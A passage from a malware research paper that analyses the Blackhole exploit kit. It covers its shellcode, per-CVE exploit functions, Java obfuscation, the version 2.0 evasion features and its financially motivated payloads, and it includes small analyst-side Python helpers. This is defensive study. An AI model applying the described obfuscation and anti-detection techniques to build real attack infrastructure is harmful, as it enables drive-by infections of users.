The shellcode itself is nothing special; it is the usual boring downloader code that we have seen in web attacks many times over. The Windows API names are looked up by the usual ror 0x0d encoded checksums.

Figure 8. The traditional shellcode.
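For readers unfamiliar with the checksum lookup mentioned above, here is a minimal Python sketch of the widely used rotate-right-by-13 name hash. It assumes the common variant (rotate the 32-bit accumulator right by 0x0d, then add the next character, without hashing the terminating zero); whether the Blackhole shellcode follows this exact variant was not verified here, and the function names are hypothetical.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name):
    """Checksum of an API name: ROR the accumulator by 0x0d, then add each byte."""
    h = 0
    for byte in name.encode("ascii"):
        h = ror32(h, 0x0D)
        h = (h + byte) & 0xFFFFFFFF
    return h
```

An analyst would typically precompute ror13_hash() for the export names of kernel32.dll and urlmon.dll and look up the constants found in the shellcode in that table, which recovers the API names without executing anything.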

This shellcode is the same in all exploit functions. The only difference is that in most cases it is XORed with 0x28 and the code starts with a short decryptor, whereas in the cases of the PDF libtiff exploit and the HCP exploit, the XOR layer is missing from the top of the shellcode.
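Removing such a single-byte XOR layer is straightforward. The Python sketch below shows the operation under the assumption that the encoded region has already been located; the function name is hypothetical, and the offset and length of the encoded part (that is, where the short decryptor ends) must be determined from the sample itself.

```python
def xor_decode(data, key=0x28):
    """Return `data` with every byte XORed with `key` (0x28 by default)."""
    return bytes(b ^ key for b in data)
```

Since XOR is its own inverse, applying xor_decode() twice with the same key returns the original bytes, so the same helper serves for both encoding and decoding test data.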

spl4: Windows Help and Support Center Vulnerability

This exploit function delivers the exploit for vulnerability CVE-2010-1885. It is used in two forms. In some cases the script is only linked into the mainfile script; in other cases the downloader script is actually embedded into it. Which form is selected depends on the OS and browser version (see Table 1a and Table 1b).

Figure 9. Directly embedded downloader code.

In either case, the downloader code is the classical XMLHTTP+ADODB downloader, which does not need to use the MDAC exploit.

Figure 10. Decoded downloader code.

spl5: Flash CVE-2011-0611

This exploit function delivers the CVE-2011-0611 Adobe Flash vulnerability in multiple stages, using two SWF files. The components are shown in Figure 11.

Figure 11. The mainfile fragment of the SWF attack.

The stage 1 component allocates and fills large enough memory buffers in order to make the preparations for the second stage.

This SWF file (field.swf) utilizes the ExternalInterface class of the ActionScript language that allows the code running in the SWF file to communicate with the embedding container – which in this case is the mainfile script. The communication in this case consists of calling the getAllocSize, getBlockSize, etc. functions, then getCN, which loads the second stage SWF.

Figure 12. ExternalInterface function calls in stage 1 SWF.

The second stage file (score.swf) drops an SWF file that calls getShellCode() to get the shellcode. This shellcode is then invoked by the conditions set by the heap spray.

Figure 13. Calling getShellCode from the second SWF component.

spl6: Flash CVE-2011-2110

This exploit code has recently been added (from v. 1.2.4) to the Blackhole menu. The function embeds an SWF file as an object into the mainfile response page.

Figure 14. Spl6 in the mainfile script.

The loaded SWF file has an ActionScript downloader script which will connect back to download the binary payload.

Figure 15. The decompiled ActionScript code.

spl7: XML Core Services – CVE-2012-1889

This exploit function is interesting in that it sheds some light on the development practice of an exploit author. The exploit was apparently used in targeted attacks as early as March 2012; at least, some live samples using it popped up on the popular website analysis tool, jsunpack.jeek.org. The first public appearance of the code was on 24 May on the Chinese website baidu.com. From this point, events unfolded rapidly. Microsoft published an advisory on 12 June. Four days later, support for the vulnerability was added to the Metasploit framework. At around the same time, the Blackhole author was interviewed and confirmed that support for the vulnerability would be added to Blackhole soon. Finally, on 22 June, version 1.2.5 was released including this exploit.

Figure 16. Timeline of CVE-2012-1889.
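The intervals between these events can be worked out with simple date arithmetic. The short sketch below uses only the dates quoted in the text; the year 2012 for the May and June dates is an assumption inferred from the context, and the variable names are illustrative.

```python
from datetime import date, timedelta

# Dates quoted in the text; the year 2012 is assumed from the context.
first_public_code = date(2012, 5, 24)   # code appears on baidu.com
ms_advisory = date(2012, 6, 12)         # Microsoft advisory
metasploit_support = ms_advisory + timedelta(days=4)  # "four days later"
blackhole_release = date(2012, 6, 22)   # Blackhole v1.2.5

days_code_to_advisory = (ms_advisory - first_public_code).days
days_advisory_to_release = (blackhole_release - ms_advisory).days
days_metasploit_to_release = (blackhole_release - metasploit_support).days

print(metasploit_support.isoformat())   # 2012-06-16
print(days_code_to_advisory)            # 19
print(days_advisory_to_release)         # 10
print(days_metasploit_to_release)       # 6
```

Under these assumptions, the exploit reached Blackhole ten days after the advisory and six days after Metasploit support.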

The timeline of this particular exploit suggests that the support was added in haste. Looking at the result, one can see immediately that this code is a distinct block in the server code: the coding style is not integrated into the general style of the mainfile script. Not even the indentation conforms to the conventions of the mainfile script (i.e. no indentation and no unnecessary whitespace).

Figure 17. CVE-2012-1889 code in Blackhole.

If we compare the added code with the most authentic source we know of – that published in May on baidu.com – it is easy to see that the code was copy-pasted into Blackhole. The function order, the variable names, the indentation, the constants – in short, everything is an exact copy of that code.

Figure 18. The genuine CVE-2012-1889 code from China.

The major difference is the shellcode, which is the standard one used in all the other exploit functions, although this time it is not XOR encrypted.

Evidently, support for this exploit was added to the kit in a hurry – more as a PR move to prove that the author could react quickly, than as a real improvement. In fact, the author must have been convinced of the rather limited use of his enhancement, because in the field only a handful of cases were observed in which this exploit was turned on. In the vast majority of the cases this exploit function remained empty.

NOJS: Java – CVE-2010-0840

This part of the mainfile response page works without JavaScript support. It loads a Java archive, which receives the encrypted URL as a parameter. The encryption is a simple substitution cipher, using a randomly shuffled alphabet string as the substitution key.

Figure 19. URL obfuscation in Java downloader.
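For analysis purposes, a scheme of this kind can be sketched in a few lines of Python. This is a minimal illustration only: the character set, the key generation and the names `PLAIN_ALPHABET`, `make_key`, `encode` and `decode` are assumptions made for the example, not the values or code used by the kit.

```python
import random
import string

# Hypothetical character set; the alphabet used by the kit may differ.
PLAIN_ALPHABET = string.ascii_letters + string.digits + ":/.?=&-_%"


def make_key(seed=None):
    """Return a randomly shuffled copy of PLAIN_ALPHABET to use as the key."""
    chars = list(PLAIN_ALPHABET)
    random.Random(seed).shuffle(chars)
    return "".join(chars)


def encode(url, key):
    """Replace each character with the key character at the same index."""
    return url.translate(str.maketrans(PLAIN_ALPHABET, key))


def decode(obfuscated, key):
    """Invert the substitution by mapping key characters back to the alphabet."""
    return obfuscated.translate(str.maketrans(key, PLAIN_ALPHABET))


key = make_key(seed=2012)
url = "http://example.invalid/payload?id=1"  # placeholder URL
hidden = encode(url, key)
print(hidden)
print(decode(hidden, key) == url)  # True
```

Because the key is just a permutation of the alphabet, anyone who recovers the key string from the applet parameters can reverse the mapping directly, which is why this obfuscation offers little protection against analysis.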

The Java downloaders use different levels of obfuscation. In the simplest cases the strings are only reversed, broken up into smaller chunks, or encrypted.

Figure 20. Simple string obfuscations in Blackhole Java components.
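Undoing the two simplest transformations mentioned above (reversal and chunking) is straightforward. The sketch below is an analyst-side illustration; the helper names and the sample strings are hypothetical and are not taken from the Blackhole class files.

```python
def unreverse(text):
    """Undo a plain string reversal."""
    return text[::-1]


def join_chunks(chunks):
    """Reassemble a string that was split into smaller pieces."""
    return "".join(chunks)


def deobfuscate(chunks, is_reversed=False):
    """Join the chunks, then undo the reversal if one was applied."""
    joined = join_chunks(chunks)
    return unreverse(joined) if is_reversed else joined


# Hypothetical samples: one reversed string, one chunked, one with both applied.
print(unreverse("eman.so"))                             # os.name
print(join_chunks(["java.", "net", ".URL"]))            # java.net.URL
print(deobfuscate(["eman", ".so"], is_reversed=True))   # os.name
```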

There were also more complex cases in which the obfuscation was performed with the professional Java protection tool Zelix KlassMaster [4].

Zelix KlassMaster (ZKM) is an efficient tool that makes analysis very complicated, hiding the string constants from the decompilation output. It is worth noting that the version of ZKM was 5.4.3 in all of the observed Blackhole-related files. The author didn’t care to upgrade to the currently available 5.5.0 version.

The usage of ZKM is not exclusive – in other class files the code is left readable, only the string constants are obfuscated with simple methods.

Why Java?

When I started the analysis of the Blackhole server-side code, I had a couple of questions in mind (needless to say, the number of questions multiplied with each day). The very first question came when I looked at the exploit distribution statistics available from a few Blackhole back-ends. All had the same characteristics that are shown in Figure 21: an overwhelming dominance of Java exploitations.

Figure 21. Exploit delivery stats.

In each of them, Java exploits proved to be the most effective infection vectors – always by a large margin. I had a couple of ideas as to the possible reason for this phenomenon:

  • The mainfile logic is skewed and favours Java over the other vulnerabilities – it serves the others only if Java distribution fails.

  • The mainfile is buggy, and if some exploit function crashes, the rest will not have a chance to activate – whereas the NOJS Java component always executes.

  • The downloadfile logic does not count subsequent download attempts after the first one (which is usually the NOJS Java that does not need time-consuming decryption) hits the server.

After evaluating the code, it turned out that none of my hypotheses were true. The Blackhole exploit kit doesn’t favour any of the individual exploit functions. At this point, running out of ideas, I had to follow the advice of Sir Arthur Conan Doyle's detective Sherlock Holmes: ‘Once you eliminate the impossible, whatever remains, no matter how improbable, must be the truth.’

So after eliminating the above hypotheses, I was left with the following, however ridiculous it sounds: the Java security fixes are not installed on the end-users’ computers. Users don’t consider Java to be an immediate threat, and consequently don’t rush to update their systems. And that is the biggest security challenge regarding web threats. We need to make users aware that, right now, Java is the weakest spot – and it is heavily under attack.

Version 2.0

This research was nearly finished when a new major version of Blackhole (2.0) was released. This paper will not cover that version in detail; however, it deserves at least a brief mention.

The most important new features of this version are [7] (as claimed by the author):

  • Direct download of executable payloads is prevented.

  • Exploit contents are only loaded when the client is considered vulnerable.

  • Use of the PluginDetect library in Java versioning has been dropped (reducing the necessary code size significantly).

  • Some old exploits have been removed (leaving Java atomic and byte, PDF LibTIFF, MDAC).

  • The predictable URL structure has been changed (filenames and querystring parameter names).

  • Machine stats have been updated to include Windows 8 and mobile devices.

  • A better breakdown of plug-in version information is provided.

  • The checking of the referrer has been improved.

  • TOR traffic is blocked.

  • A self-learning mode is available for blacklisting (outside of distribution campaigns, all downloads can be assumed to come from security researchers, and are thus blacklisted).

The URL structure of versions 1.x was indeed very predictable, allowing URL-filtering products to block infection attempts easily. This has been changed: the query parameter names are now random, and the values are obfuscated.

The mainfile response script starts with the attenuated PluginDetect code, which contains only the Adobe Reader versioning.

That is followed by the individual exploit functions, and there are not many of them left: only PDF and MS06-014 were observed, with the additional NOJS Java downloader.

The exploit functions are not chained one after the other; instead, they follow each other in separate try{} constructs.
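The practical difference between the two layouts is how a failure propagates. The sketch below is a simplified model of the control flow only, written in Python rather than the kit's JavaScript; the step names and the `run_chained` and `run_isolated` helpers are hypothetical placeholders.

```python
def run_chained(steps):
    """Model of a chain: a failure in one step stops everything after it."""
    ran = []
    try:
        for name, step in steps:
            step()
            ran.append(name)
    except Exception:
        pass
    return ran


def run_isolated(steps):
    """Model of separate try blocks: each step fails or succeeds on its own."""
    ran = []
    for name, step in steps:
        try:
            step()
            ran.append(name)
        except Exception:
            continue
    return ran


def ok():
    """Placeholder step that completes normally."""


def crash():
    """Placeholder step that fails."""
    raise RuntimeError("step failed")


steps = [("first", ok), ("second", crash), ("third", ok)]
print(run_chained(steps))   # ['first']
print(run_isolated(steps))  # ['first', 'third']
```

In this model, the isolated layout still reaches the third step after the second one fails, whereas the chained layout does not.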

Figure 22. Blackhole v2.0 code.

Payloads

At some point, usually around the end of an analysis, we have to ask ourselves: what for? What is the likely objective of the Blackhole distribution campaigns? It can be best understood by inspecting the downloaded executable payloads, because from the point of view of the infection process, that component is the final destination.

The chart in Figure 23 breaks down the payloads observed over a two-month period (August and September 2012) into major categories.

Figure 23. Payload breakdown.

It clearly shows the motivation of the purchasers of Blackhole: financial gain. Most of the distributed payload samples either collect money directly (FakeAV, Ransomware), steal information to gain money (ZBot, password stealers), or take part in click fraud (ZeroAccess). The rest are backdoors and downloaders that facilitate the attacks.

The sole purpose of Blackhole operators is to make money – which shouldn’t come as a surprise. Nevertheless, the above chart explains the large number of ongoing complaints about fake AV and ransomware infections. Nothing personal, it’s just about the money.
